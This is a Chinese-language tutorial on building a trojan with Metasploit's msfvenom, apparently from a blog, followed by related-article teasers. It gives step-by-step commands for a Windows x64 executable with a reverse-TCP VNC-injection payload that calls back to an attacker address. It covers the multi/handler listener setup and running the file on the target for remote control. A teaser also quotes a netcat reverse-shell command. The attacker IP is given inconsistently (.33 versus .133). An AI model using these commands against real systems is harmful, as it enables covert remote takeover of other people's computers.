Metasploit -- 木马生成原理和方法

简介: Metasploit -- 木马生成原理和方法

一、生成方式:利用msf模块中的msfvenom模块


二、原理:msfvenom是msfpayload、msfencode的结合体,利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线


三、msfvenom命令行选项如下


-p, --payload    <payload>       指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用'-'或者stdin指定    


-l, --list       [module_type]   列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all    


-n, --nopsled    <length>        为payload预先指定一个NOP滑动长度    


-f, --format     <format>        指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)    


-e, --encoder    [encoder]       指定需要使用的encoder(编码器)    


-a, --arch       <architecture>  指定payload的目标架构        


--platform   <platform>      指定payload的目标平台    


-s, --space      <length>        设定有效攻击荷载的最大长度    


-b, --bad-chars  <list>          设定规避字符集,比如: '\x00\xff'    


-i, --iterations <count>         指定payload的编码次数    


-c, --add-code   <path>          指定一个附加的win32 shellcode文件    


-x, --template   <path>          指定一个自定义的可执行文件作为模板    


-k, --keep                       保护模板程序的动作,注入的payload作为一个新的进程运行        


--payload-options            列举payload的标准选项    


-o, --out   <path>               保存payload    


-v, --var-name <name>            指定一个自定义的变量,以确定输出格式        


--shellest                   最小化生成payload    


-h, --help                       查看帮助选项        


--help-formats               查看msf支持的输出格式列表


四、使用方法


1、msfvenom --list platforms   显示支持的平台


0a2653c851af460fa595bd959398a8f1.png


2、msfvenom --list formats   显示支持的格式


0eacb84100b54626af849e6b562bf92a.png

2d65d23f6d4748949b924e4057485923.png


3、msfvenom --list archs   显示支持的架构


2e9b90b2ca334476abebe75bafe6eeaa.png


4、msfvenom --list encoders   显示支持的编码器


0a2653c851af460fa595bd959398a8f1.png


5、生成木马


目标主机:192.168.1.129(win7 x64)


攻击机:192.168.1.33


攻击端口:12121


生成木马:msfvenom --arch x64 --platform windows -p windows/x64/vncinject/reverse_tcp lhost=192.168.1.133 lport=12121 -f exe -o /root/win64.exe


0eacb84100b54626af849e6b562bf92a.png


6、进入监听模块          use exploit/multi/handler


7、设置payload反弹    set payload windows/x64/vncinject/reverse_tcp


2d65d23f6d4748949b924e4057485923.png


8、查看需要设置的参数:show options


2e9b90b2ca334476abebe75bafe6eeaa.png


9、设置攻击机ip:set lhost 192.168.1.133


10、设置攻击端口:set lport 12121


0a2653c851af460fa595bd959398a8f1.png


11、将生成的exe文件上传到目标主机并运行


12、run攻击


0eacb84100b54626af849e6b562bf92a.png


13、攻击机的监控画面


2d65d23f6d4748949b924e4057485923.png


14、目标主机画面


2e9b90b2ca334476abebe75bafe6eeaa.png


禁止非法,后果自负


目录
相关文章
|
安全 数据安全/隐私保护 Windows
【内网渗透】神器Mimikatz的入门简单实践
【内网渗透】神器Mimikatz的入门简单实践
2933 0
【内网渗透】神器Mimikatz的入门简单实践
|
Shell Linux Windows
nc简单反弹shell
该内容描述了在Windows和Linux环境中使用`nc`(Netcat)工具建立反弹shell的过程。在Windows上,反弹端通过命令`nc -e cmd IP 端口`将控制权反弹到指定IP;控制端则运行`nc -lvvp 端口`等待连接。在Linux环境下,类似地,使用`nc -l -v -p 端口`作为控制端,而被控端用`nc 目标IP 端口`进行连接。文中还包含相关截图以辅助说明。
1003 0
|
10月前
|
存储 安全 前端开发
Web渗透-文件上传漏洞-上篇
文件上传漏洞常见于Web应用,因类型限制不严可致恶意文件执行。本文介绍前端检测、MIME类型、黑名单、.htaccess、空格、双写等多种绕过方式,并结合upload-labs靶场演示利用方法,提升安全防护认知。
3094 1
Web渗透-文件上传漏洞-上篇
|
安全 NoSQL 关系型数据库
内网扫描器Fscan
内网扫描器Fscan
|
存储 安全 JavaScript
XSS跨站脚本攻击详解(包括攻击方式和防御方式)
这篇文章详细解释了XSS跨站脚本攻击的概念、原理、特点、类型,并提供了攻击方式和防御方法。
8426 3
|
Linux 测试技术 网络安全
SSH服务开机自动
【7月更文挑战第14天】
2312 5
|
安全 Linux API
一篇文章讲明白Metasploit详解详细图文教程
一篇文章讲明白Metasploit详解详细图文教程
1444 0
|
存储 Linux 网络安全
Kali 渗透测试:Meterpreter在Windows系统下的使用
Kali 渗透测试:Meterpreter在Windows系统下的使用
966 0
|
安全 网络安全 数据库
扫描神器:Nessus 保姆级教程(附步骤)
扫描神器:Nessus 保姆级教程(附破解步骤)